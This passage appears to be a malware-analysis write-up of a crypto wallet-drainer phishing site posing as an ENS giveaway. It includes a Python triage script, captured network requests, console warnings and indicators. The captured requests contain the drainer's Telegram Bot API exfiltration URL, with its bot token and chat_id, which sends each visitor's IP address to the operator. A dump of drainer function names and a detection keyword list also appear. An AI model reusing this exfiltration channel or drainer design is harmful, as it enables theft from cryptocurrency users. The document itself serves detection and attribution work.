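    ("https://ensgiveaway-claim.com/",
     "https://unpkg.com/@walletconnect/web3-provider@1.7.1/dist/umd/index.min.js", None),
    ("https://ensgiveaway-claim.com/assets/main.js", "https://api.ipify.org/", 15),
    ("https://ensgiveaway-claim.com/assets/main.js",
     "https://api.telegram.org/bot5755492923:AAFpSok6EgmPbC3OXnCSnRMbFDGMiaPpT64/"
     "sendMessage?chat_id=-855472091&parse_mode=markdown&text=%F0%9F%92%A0%20"
     "%D0%9F%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%20"
     "185.213.155.176%20%D0%B7%D0%B0%D1%88%D0%B5%D0%BB%20%D0%BD%D0%B0%20"
     "%D1%81%D0%B0%D0%B9%D1%82", 485),
]

# Excerpt of the report's "JavaScript Global Variables" dump, same "type| name" layout.
GLOBALS = (
    "function| $ function| jQuery function| _0x4364 function| _0x364b "
    "function| Web3 object| WalletConnectProvider object| ERC20_ABI "
    "function| _0x1a38 function| _0x12c6 string| ownerAddress "
    "string| MORALIS_KEY string| ZAPPER_KEY function| connectMetamask "
    "function| fetchUserTokens function| sendEth function| sendToken "
    "function| sendNFT function| drain function| _0x1083 function| logTx "
    "function| sendMsg function| _0x4428 function| connectAndDrain"
)

# Assumed starter lists (not from the report); extend from your own telemetry.
IP_ECHO_HOSTS = {"api.ipify.org", "api64.ipify.org", "ipinfo.io", "icanhazip.com"}
WALLET_LIB_MARKERS = {"web3": "/web3/", "walletconnect": "@walletconnect/"}
DRAINER_TERMS = ("drain", "sendeth", "sendtoken", "sendnft", "fetchusertokens",
                 "owneraddress", "moralis_key", "zapper_key")
OBFUSCATED_NAME = re.compile(r"^_0x[0-9a-f]{4,}$")   # javascript-obfuscator style names
TELEGRAM_PATH = re.compile(r"^/bot(\d+:[\w-]+)/(\w+)$")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_telegram_call(url):
    """Split a Bot API URL into token, method, chat_id and percent-decoded text."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        return None
    m = TELEGRAM_PATH.match(parts.path)
    if not m:
        return None
    query = parse_qs(parts.query)          # parse_qs percent-decodes the values
    return {"token": m.group(1), "method": m.group(2),
            "chat_id": query.get("chat_id", [""])[0],
            "text": query.get("text", [""])[0]}


def correlate_ip_echo(requests, exfil_text):
    """Tie an IP-echo lookup to an address that later shows up in exfiltrated text."""
    for _, url, length in requests:
        host = urlsplit(url).hostname
        if host not in IP_ECHO_HOSTS:
            continue
        for ip in IPV4.findall(exfil_text):
            # Services like ipify return the bare address, so the response body
            # length equals the length of the dotted quad that was exfiltrated.
            if length is None or length == len(ip):
                return {"lookup_host": host, "visitor_ip": ip}
    return None


def classify_globals(dump):
    """Return (drainer-style names, obfuscator-style names) from a 'type| name' dump."""
    names = [name for _, name in re.findall(r"(\w+)\|\s*(\S+)", dump)]
    drainer = [n for n in names if any(t in n.lower() for t in DRAINER_TERMS)]
    obfuscated = [n for n in names if OBFUSCATED_NAME.match(n)]
    return drainer, obfuscated


def triage(requests, globals_dump):
    report = {"telegram": None, "ip_exfil": None, "wallet_libs": []}
    for requester, url, _ in requests:
        for lib, marker in WALLET_LIB_MARKERS.items():
            if marker in url and lib not in report["wallet_libs"]:
                report["wallet_libs"].append(lib)
        call = parse_telegram_call(url)
        if call:
            call["called_from"] = requester
            report["telegram"] = call
            report["ip_exfil"] = correlate_ip_echo(requests, call["text"])
    report["drainer_globals"], report["obfuscated_globals"] = classify_globals(globals_dump)
    report["verdict"] = ("wallet drainer" if report["wallet_libs"] and report["telegram"]
                         and report["drainer_globals"] else "inconclusive")
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(triage(REQUESTS, GLOBALS), ensure_ascii=False, indent=2))
```

The length comparison is deliberately loose (a lookup whose body length is unknown still counts) because the aim is to surface the pairing for an analyst, not to prove it; the bot token and chat_id in the output are the indicators worth pivoting on, since the same operator tends to reuse them across domains.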

0 Cookies

4 Console Messages

Source  Level    URL                                                  Message
other   warning  https://ensgiveaway-claim.com/#airdrop (line 392)    Failed to decode downloaded font: https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@700&display=swap
other   warning  https://ensgiveaway-claim.com/#airdrop (line 392)    OTS parsing error: invalid sfntVersion: 791289955
other   warning  https://ensgiveaway-claim.com/#airdrop (line 392)    Failed to decode downloaded font: https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@700&display=swap
other   warning  https://ensgiveaway-claim.com/#airdrop (line 392)    OTS parsing error: invalid sfntVersion: 791289955

The sfntVersion 791289955 is 0x2F2A2063, the ASCII bytes "/* c": the browser was handed the Google Fonts stylesheet (which opens with a CSS comment) where it expected a font file, so the page references the css2 URL as a font rather than as a stylesheet. Cosmetic, but it matches the "Font" type urlscan assigned to that request.

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

api.ipify.org
api.telegram.org
cdnjs.cloudflare.com
code.jquery.com
ensgiveaway-claim.com
ensgiveaway.com
fonts.googleapis.com
unpkg.com
185.149.120.87
2001:4de0:ac18::1:a:1a
2001:67c:4e8:f004::9
2606:4700::6810:7baf
2606:4700::6811:190e
2a00:1450:4001:830::200a
3.220.57.224